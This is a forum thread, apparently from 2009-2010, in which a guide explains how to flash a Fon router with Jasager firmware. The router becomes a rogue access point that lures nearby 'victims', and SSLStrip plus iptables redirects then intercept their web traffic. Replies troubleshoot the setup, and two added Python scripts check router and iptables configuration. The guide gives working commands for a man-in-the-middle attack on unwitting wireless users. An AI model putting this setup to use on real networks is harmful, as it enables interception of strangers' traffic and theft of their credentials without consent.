Netshroud
Posted December 30, 2009 (edited)

(I'm unsure as to how Step 1 works on a virgin Fon 2100. If it doesn't work, try the downgrading and patching to enable RedBoot as mentioned in Darren's guide.)

Part 1: Flashing the Fon+

The first step to installing Jasager is to flash the Fon with the Jasager firmware, which can be found at Digininja's site (http://www.digininja.org/files/jasager_firmware_1.0.tar.bz2).

To simplify the process, I'll be using the nifty "Fon Flash" application at http://www.gargoyle-router.com/download.php. For some reason the Windows version failed to work for me (it was complaining about ARP sizes), so I used the Linux version off an Ubuntu 9.04 LiveCD. I haven't tried the Windows version on anything other than Vista SP2 Business x64, so if it works for you, enjoy.

Untar the Jasager firmware to the directory of your choice, as well as the Fon Flash utility. For some reason Fon Flash failed to launch when I ran it from a Windows share, so I copied it to the desktop.

Next, run Fon Flash. If it complains about not finding interfaces, give it your password to sudo itself. Under Windows Vista/7, you probably need to run it with elevated privileges. Make sure that the firmware type is set to "OpenWrt / Gargoyle", and select your Ethernet interface (if you have multiple ones, the one connected to the Fon). Point the Rootfs file to openwrt-atheros-root.squashfs, and the Kernel file to openwrt-atheros-xmlinux.lzma.

Next, open up a terminal. Make sure that your Ethernet interface is set to 192.168.0.254. Connect your system to the Fon's LAN port via Ethernet. Disable any network manager you may have running. For Ubuntu, right-click on the network notification icon and uncheck "Enable Networking".

Switch back to the Fon Flash utility, and click "Flash Router Now!" Plug in the power to your Fon (or restart it), sit back and wait until you see the "Device flashed successfully" notification. This took about 15 minutes for me, so go for a walk, read a book, or chat in #hakhouse.

Part 2: Configuring the Fon and network

Once the Fon is flashed, set your computer to an IP on the 192.168.1.0/24 range. Telnet into the Fon on 192.168.1.1. Run 'passwd' to set the root password, then disconnect. SSH into the Fon. Accept the host key, and log in as root with your new password.

First, you need to enable the wireless. The following commands will do this:

    uci set wireless.wifi0.disabled=0
    uci commit wireless && wifi

Next, pick an IP range and IP address for the Fon. I chose to use one on the private 172.16-32.X.Y range, because my home network is on the 10. range, and a couple of places I want to demo it at use 192.168. Execute the following commands to do as I did, and set the Fon to 172.20.0.2:

    uci set network.lan.ipaddr=172.20.0.2
    uci set network.lan.gateway=172.20.0.1
    uci set network.lan.dns=10.10.0.1
    uci commit network

(10.10.0.1 is my home router.)

Also configure dnsmasq to give out the gateway IP and DNS servers. In /etc/config/dhcp, under the section config dhcp lan, add:

    list 'dhcp_option' '3,172.20.0.1'
    list 'dhcp_option' '6,10.10.0.1'

Reboot the Fon (the command via SSH is 'reboot'). Change your IP to be on the Fon's range, then SSH into its new IP address. Accept the host key.

Now we need to set up Internet access on the Fon. When running Jasager, your network setup will/should look like this:

    Internet --> Router --> Computer --> Fon --> Victims

We need to configure the computer to share its internet connection with the Fon. Under Windows, just enable Internet Connection Sharing. Under Linux, execute:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

where eth0 is your internet-facing interface.

If you're doing what I did, and using a Virtual Machine for Jasager, you need to give it 2 virtual interfaces. For VMware users, run vmnetcfg.exe (found in C:\Program Files (x86)\VMware\VMware Workstation\ for me). Make sure that one vmnet is bridged to your internet interface, and one is bridged to your Ethernet/Fon interface.

If you can now ping google.com from the Fon, move on. If not, make sure you have done everything correctly.

Next, I had to edit /karma/www/cgi-bin/functions.rb on the Fon to bridge ath0 correctly. Unless you're fluent in vi, I would recommend installing nano:

    opkg update
    opkg install libncurses nano

In functions.rb, underneath:

    system("wlanconfig ath0 create wlandev wifi0 wlanmode master 2>&1 > /dev/null")

add:

    system("sleep 1")
    system("brctl addif br-lan ath0")

and replace:

    system("ifconfig", "ath0", "10.1.1.1", "up")

with:

    system("ifconfig", "ath0", "up")

Part 3 (Optional): Installing X-Wrt

The main reason I needed X-Wrt was that I couldn't figure out how to change the time zone without it. To install X-Wrt, simply run:

    echo "src X-Wrt http://downloads.x-wrt.org/xwrt/kamikaze/8.09/atheros/packages" >> /etc/opkg.conf
    opkg update
    opkg install webif

Part 4: Running Jasager

Now connect over HTTP using your browser of choice to the Fon on port 1471. Log in with username "root" or "admin", and your root password. Click the big grey button, turn karma on, and wait for victims to get friendly with Jasager.

This is the script I use to share the internet on the Ubuntu VM, and start SSLStrip:

    echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    sudo ifconfig eth1 172.20.0.1 netmask 255.255.255.0
    sudo dhclient eth0
    python sslstrip-0.7/sslstrip.py -l 64123 -f sslstrip-0.7/lock.ico

Edited April 21, 2010 by Psychosis
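Several replies in this thread are about the Fon's LAN, gateway and DHCP settings not agreeing with each other. The sanity check below is an added example, not part of the guide or of Jasager: it parses the two UCI files the guide edits (/etc/config/network and /etc/config/dhcp, reconstructed inline as constructed samples with the addresses from the post) and reports when the gateway is outside the LAN subnet or when the dnsmasq options 3 (router) and 6 (DNS) do not match what the network section says.

```python
import ipaddress
import re

# Constructed sample of the two UCI files the guide edits (not from a real Fon); addresses as in the post.
NETWORK_CONF = """
config interface 'lan'
    option ipaddr '172.20.0.2'
    option netmask '255.255.255.0'
    option gateway '172.20.0.1'
    option dns '10.10.0.1'
"""
DHCP_CONF = """
config dhcp 'lan'
    list 'dhcp_option' '3,172.20.0.1'
    list 'dhcp_option' '6,10.10.0.1'
"""
OPTION_NAMES = {3: "router", 6: "dns"}  # DHCP option codes the guide hands out
_TOKEN = re.compile(r"'[^']*'|\S+")     # a quoted value or a bare word

def parse_uci(text):
    """Parse UCI text into {section: {"type": ..., "options": {}, "lists": {}}}."""
    sections, current = {}, None
    for line in text.splitlines():
        words = [w.strip("'") for w in _TOKEN.findall(line.strip())]
        if not words or words[0].startswith("#"):
            continue
        if words[0] == "config":  # 'config <type> [name]'; unnamed sections get an index
            name = words[2] if len(words) > 2 else f"@{words[1]}[{len(sections)}]"
            current = sections.setdefault(name, {"type": words[1], "options": {}, "lists": {}})
        elif words[0] == "option" and current is not None:
            current["options"][words[1]] = words[2]
        elif words[0] == "list" and current is not None:
            current["lists"].setdefault(words[1], []).append(words[2])
    return sections

def check_lan_config(network_text, dhcp_text):
    """Return problems found; an empty list means LAN and DHCP settings agree."""
    problems = []
    lan = parse_uci(network_text)["lan"]["options"]
    net = ipaddress.ip_interface(f"{lan['ipaddr']}/{lan['netmask']}").network
    if ipaddress.ip_address(lan["gateway"]) not in net:
        problems.append(f"gateway {lan['gateway']} is not inside LAN {net}")
    handed = {}  # what dnsmasq will tell clients: option name -> value
    for raw in parse_uci(dhcp_text)["lan"]["lists"].get("dhcp_option", []):
        code, _, value = raw.partition(",")
        handed[OPTION_NAMES.get(int(code), code)] = value
    for key, want in (("router", lan["gateway"]), ("dns", lan["dns"])):
        if handed.get(key) != want:
            problems.append(f"dhcp {key} option {handed.get(key)} != network {key} {want}")
    return problems
```

Feed it the real files (for example via scp from the Fon) and an empty result means clients will be told the same router and DNS the Fon itself uses.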
John Doeeee
Posted April 17, 2010

Hi, I used Windows 7 with FonFlash and the first time nothing happened. I tried in Ubuntu but didn't get FonFlash working. The second time I tried in Windows, it did it :D Device flashed successfully :D Then I set my IP to 192.168.1.2 and rebooted the Fon. I tried to telnet with telnet and PuTTY but both didn't work, and in ipconfig the default gateway was empty. So how can I fix this? Thanks very much.
Netshroud (Author)
Posted April 17, 2010

In ipconfig the default gateway would be empty if you didn't set one when you set a static IP. Can you ping 192.168.1.1? Does it show up on an NMAP ping sweep? Can you post a screenshot of your IP configuration?
John Doeeee
Posted April 18, 2010

Ping scan: timed out. The nmap scan says 0 hosts up, and here is a screen dump of my settings.
Netshroud (Author)
Posted April 18, 2010

Weird. Is the power on and the network cable connected properly?
John Doeeee
Posted April 18, 2010 (edited)

lol, yes, it has power and the cable is as secure as can be. But for the record, the only thing I did with this Fon is flash the Atheros chip; that's step 1 in your guide and step 11* in the Jasager guide. So OpenWRT is not installed on the Fon, so wouldn't it be impossible to telnet to the Fon?

*I have a Fon 2201, firmware 1.1.1 RC2, and I asked the forum how I should handle it. They said I could start at step 11 of the Jasager guide, so I did, but step 11 is the same as your step 1, and that's flashing the Atheros chip or something. Step 12 is telnetting over to the Fon.

Edited April 18, 2010 by GuyDols
Netshroud (Author)
Posted April 18, 2010

Flashing it is installing OpenWRT (and Jasager and its dependencies). As ridiculous as it may sound, try flashing it again. I had a similar issue, and reflashing it fixed it.
John Doeeee
Posted April 18, 2010

OK, I will now retry it. I will post when I'm done.
John Doeeee
Posted April 18, 2010

I flashed successfully but can't telnet into it. I did an nmap range scan; the only IP up is me :(
John Doeeee
Posted April 18, 2010

I found out that when I start pinging and then plug the power in, I get like 4 packets back and then it's dead again. I tried telnet and SSH, but I can get in to reboot with telnet on port 9000. Do you know maybe which port I can test too? I tried flashing it 3 times.
Netshroud (Author)
Posted April 18, 2010

Run a ping scan on 192.168.0.0/16, 10.0.0.0/8, and 172.16.0.0/12, see if it shows up at all. (Remember to change your IP to be on the subnet you're scanning.)
John Doeeee
Posted April 19, 2010

I did all the scans; it took forever and didn't find anything. But when I don't assign an IP, I get this IP from the Fon: 169.254.63.223 255.255.0.0. So I thought it couldn't hurt if I scanned that subnet, and that's what I'm now doing. I'll let you know when I find something.
Netshroud (Author)
Posted April 19, 2010

That's not an IP address you would get from the Fon, that's an autoconfiguration IP. Your OS would have assigned you that IP when it didn't get one from the Fon. Which leaves me confused. Is the image you flashed corrupt in any way? Are the lights on the Fon flickering?
John Doeeee
Posted April 19, 2010

When I plug the power in, the power, internet and computer lights go on, wireless not. After 1 sec internet and computer go off, then after 2 sec the internet starts flickering, then after 10 sec power and internet go off, and then internet starts flickering but the power light is off.
John Doeeee
Posted April 19, 2010

Maybe you could email me the image that you have that 100% works: Guy_dols@hotmail.com ty
gaud
Posted April 19, 2010

What is the MITM Fun VM you have, it sounds... fun :-)
Netshroud (Author)
Posted April 19, 2010

> Maybe you could email me the image that you have that 100% works: Guy_dols@hotmail.com ty

Just download it from http://www.digininja.org/jasager

Does anything work if you use the standard OpenWRT Kamikaze firmware? http://downloads.openwrt.org/kamikaze/8.09/atheros/

> What is the MITM Fun VM you have, it sounds... fun :-)

It's the VM I use for MITM attacks (on other VMs). It's running Ubuntu 9.10, and has dsniff, wireshark, sslstrip, SET, middler (which I used once to have a look at), metasploit and a non-functional upside-down-ternet (current project).
cooler
Posted April 20, 2010 (edited)

Thanks for the guide. I followed your guide and everything worked fine, except I've run into a strange problem. There is no internet connection for the connected clients. When I ping google from the Fon, it reaches fine, and when I ping google from connected clients it also reaches, but when opening any browser no connection can be established. Using Win7. What could be the problem and how could I fix it?

P.S. My internal IP for the Fon and PC is in the 192.168.1.1 range and my router and wlan0 are in the 192.168.120.1 range, and I'm also using wlan0 substituted for eth0.

Edited April 20, 2010 by cooler
Netshroud (Author)
Posted April 20, 2010

Is Windows 7 the ICS host / MITM, or the connected client / 'victim'? If it's the 'victim', what do you have running the ICS machine?
cooler
Posted April 20, 2010

> Is Windows 7 the ICS host / MITM, or the connected client / 'victim'? If it's the 'victim', what do you have running the ICS machine?

Hi, my ICS machine is Ubuntu 8.10; the clients are running Windows 7. On the Linux side I have ath0 with a static IP connected to the Fon.
Netshroud (Author)
Posted April 20, 2010

If you're not running SSLStrip (on port 64123), then:

    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

will cause all TCP traffic on port 80 (usually HTTP) to just get dropped. Run:

    sudo iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123

to remove that rule.
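The failure this reply describes (a REDIRECT rule pointing at a port with no listener, so every HTTP connection from the clients is refused) is easy to spot mechanically. The check below is an added example, not from the thread or from any of the tools it mentions: it reads the nat table as 'iptables-save -t nat' prints it and the listening sockets as 'ss -ltn' prints them (both constructed inline here), flags every REDIRECT whose target port nothing is bound to, and produces the matching 'iptables -D' command. It assumes the iptables-save spelling '--to-ports' for REDIRECT's target; the hand-typed '--to-port' form is accepted too.

```python
import re

# Constructed samples (not captured from the poster's machine): the nat table as
# 'iptables-save -t nat' prints it, and listening TCP sockets as 'ss -ltn' prints
# them, with nothing bound to 64123 because SSLStrip is not running.
NAT_RULES = """\
*nat
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 64123
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
"""
LISTENING = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       5       127.0.0.1:631       0.0.0.0:*
"""
# iptables-save writes REDIRECT's target as --to-ports; the manual form uses --to-port
_REDIRECT = re.compile(r"^-A (\w+) (.*?) -j REDIRECT --to-ports? (\d+)")

def listening_ports(ss_output):
    """Extract local TCP ports from 'ss -ltn' style output (header line skipped)."""
    ports = set()
    for line in ss_output.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[0] == "LISTEN":
            ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports

def dead_redirects(nat_rules, ss_output):
    """Return REDIRECT rules whose target port has no listener, each with the
    'iptables -D' command that removes it (the fix given in the reply above)."""
    open_ports = listening_ports(ss_output)
    found = []
    for line in nat_rules.splitlines():
        m = _REDIRECT.match(line)
        if m and int(m.group(3)) not in open_ports:
            chain, match, port = m.groups()
            found.append({
                "port": int(port),
                "rule": line,
                "delete": f"sudo iptables -t nat -D {chain} {match} -j REDIRECT --to-ports {port}",
            })
    return found
```

On a live box, pipe 'sudo iptables-save -t nat' and 'ss -ltn' into the two functions; an empty result means every redirect has something behind it.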
gaud
Posted April 20, 2010

I'd be interested to see your progress on the upside down. It is on my list of things to play with.
Netshroud (Author)
Posted April 20, 2010

My progress is: Everything should work. Nothing does. I'm confused.
cooler
Posted April 20, 2010

> If you're not running SSLStrip (on port 64123), then:
>
>     sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
>
> will cause all TCP traffic on port 80 (usually HTTP) to just get dropped. Run:
>
>     sudo iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
>
> to remove that rule.

The above makes no difference. I've tried a crossover cable too, still no joy.
John Doeeee
Posted April 20, 2010

> http://www.digininja.org/jasager
>
> Does anything work if you use the standard OpenWRT Kamikaze firmware? http://downloads.openwrt.org/kamikaze/8.09/atheros/

I tried both but no telnet :( And just for the record, the WiFi light never flashes and it doesn't send out an SSID anymore.